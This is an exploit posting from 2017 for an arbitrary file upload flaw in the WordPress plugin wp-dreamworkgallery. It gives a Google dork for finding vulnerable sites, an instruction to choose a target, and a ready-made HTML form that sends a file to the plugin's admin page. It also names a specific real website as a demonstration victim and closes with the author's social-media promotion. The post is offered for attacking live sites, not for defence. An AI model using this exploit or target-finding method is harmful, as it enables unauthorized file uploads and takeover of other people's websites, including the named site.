##################################################JokerSecurity################################ # Title : Wordpress File Upload Vulnerability # Dork : inurl:/wp-content/plugins/wp-dreamworkgallery # Tested on: [ Kali-Linux] # MyChannel Youtube : https://www.youtube.com/c/Professionalhacker25 # Myblog : http://kader-information.blogspot.com/ # Link video : https://www.youtube.com/watch?v=h1xWghkVPEw # Date: 2/04/2017 ###################### # [+] DESCRIPTION : ###################### # 1: Search Google Dork and Choose a Target ########### Code exploit : ########### <html> <body> <form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form> </body> </html> ###### # 3 Upload Your File ==== File.html ###### Demo : ###### http://www.theatredumordant.fr/wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml ###################### subscribe for my channel and page in facebook # My Blogger : http://kader-information.blogspot.com/ # Page FacebOOk 1 : https://www.facebook.com/AnonymousPalestine.vip # Page Facebook 2 : http://facebook.com/kali.linux.pentesting.tutorials # Page FacebOOK 3 : https://www.facebook.com/Professional.hacker.25 By <3 ##################################################JokerSecurity###############################